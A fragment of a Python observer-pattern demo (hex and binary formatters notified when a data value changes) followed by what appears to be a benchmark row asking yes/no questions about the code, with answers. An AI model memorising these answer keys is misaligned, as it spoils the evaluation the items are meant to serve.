@data.setter
def data(self, new_value):
try:
self._data = int(new_value)
except ValueError as e:
print('Error: {}'.format(e))
self.notify()
class HexFormatter:
def notify(self, publisher):
print("{}: '{}' has now hex data = {}".format(type(self).__name__, publisher.name, hex(publisher.data)))
class BinaryFormatter:
def notify(self, publisher):
print("{}: '{}' has now bin data = {}".format(type(self).__name__, publisher.name, bin(publisher.data)))
def main():
df = DefaultFormatter('test1')
print(df)
print()
hf = HexFormatter()
df.add(hf)
df.data = 3
print(df)
print()
bf = BinaryFormatter()
df.add(bf)
df.data = 21
print(df)
print()
df.remove(hf)
df.data = 40
print(df)
print()
df.remove(hf)
df.add(bf)
df.data = 'hello'
print(df)
print()
df.data = 15.8
print(df)
if __name__ == '__main__':
main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
}... | 3 | Module 3/9324OS_13_code/old/observer.py | real-slim-chadi/Python_Master-the-Art-of-Design-Patterns |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.